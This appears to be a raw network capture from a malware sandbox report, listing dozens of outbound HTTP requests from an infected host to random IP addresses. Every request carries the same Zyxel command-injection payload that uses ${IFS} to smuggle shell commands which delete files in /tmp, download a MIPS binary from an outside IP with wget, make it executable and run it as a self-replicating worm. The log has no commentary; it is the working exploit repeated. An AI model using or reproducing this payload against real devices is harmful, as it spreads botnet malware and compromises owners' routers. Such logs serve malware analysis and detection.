                                      Jan 14, 2024 15:50:43.229449987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3655192.168.2.143559071.184.119.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.229485035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3656192.168.2.144867499.188.42.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.229546070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3657192.168.2.1437636144.152.209.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.229593039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3658192.168.2.145236678.189.171.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.229625940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3659192.168.2.1454184131.100.195.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.229672909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3660192.168.2.1446134134.109.81.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.229716063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3661192.168.2.1433678156.187.183.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.229765892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3662192.168.2.1436158102.52.188.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.229801893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3663192.168.2.145495838.192.114.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.229851007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3664192.168.2.145329859.132.124.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.234097004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3665192.168.2.144503288.31.37.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.234143019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3666192.168.2.1452782140.179.54.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.234221935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3667192.168.2.1444228114.221.218.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.234724998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3668192.168.2.1442946181.202.243.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.234783888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3669192.168.2.145496083.120.236.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.234812021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3670192.168.2.145415446.160.96.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.234869003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3671192.168.2.1436828171.177.130.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.234895945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3672192.168.2.145729049.65.137.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.253072023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3673192.168.2.1460774167.9.231.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.253129005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3674192.168.2.143520265.147.176.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.253192902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3675192.168.2.1441716148.145.140.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.253276110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3676192.168.2.1446162136.82.252.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.253326893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3677192.168.2.1444150110.211.111.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.253396988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3678192.168.2.1446724196.53.242.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.253443003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3679192.168.2.1451862171.195.111.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.253511906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3680192.168.2.14411682.20.33.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.253546953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3681192.168.2.1443386194.19.227.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.253598928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3682192.168.2.1448528219.189.27.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.253647089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3683192.168.2.1448778205.125.158.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.253717899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3684192.168.2.144024417.167.42.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.253787994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3685192.168.2.1435722195.141.24.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.253849030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3686192.168.2.1445908104.174.241.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.253899097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3687192.168.2.145633074.146.19.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.253946066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3688192.168.2.1455944195.43.237.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.254003048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3689192.168.2.1447110114.97.54.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.254074097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3690192.168.2.1457910106.134.209.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.254113913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3691192.168.2.145690892.67.194.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.254157066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3692192.168.2.1458952120.55.232.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.254204988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3693192.168.2.1436730187.25.162.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.254282951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3694192.168.2.1440034192.53.193.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.254348040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3695192.168.2.1454528200.24.147.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.254414082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3696192.168.2.1451804191.145.135.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.254451036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3697192.168.2.1445068213.156.165.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.254519939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3698192.168.2.144487488.106.48.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.254580975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3699192.168.2.1448574198.131.85.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.254637003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3700192.168.2.145264035.103.240.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.254693031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3701192.168.2.143342064.190.147.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.254740000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3702192.168.2.143761076.212.150.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.254775047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3703192.168.2.143922065.56.191.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.254827023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3704192.168.2.145959839.168.245.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.254858017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3705192.168.2.146090239.66.186.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.254929066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3706192.168.2.1446648222.29.3.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.254988909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3707192.168.2.1460794159.110.3.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.255038023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3708192.168.2.145471662.254.231.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.255074978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3709192.168.2.1460802102.136.102.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.255136013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3710192.168.2.1450848168.229.102.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.255191088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3711192.168.2.145170083.206.182.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.255268097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3712192.168.2.1434802150.178.225.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.255322933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3713192.168.2.1453524190.205.56.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.255383015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3714192.168.2.1449856223.173.18.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.255440950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3715192.168.2.1439080118.217.140.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.255500078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3716192.168.2.143622235.230.48.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.255558968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3717192.168.2.1457684189.181.161.18443
                                      TimestampBytes transferredDirectionData
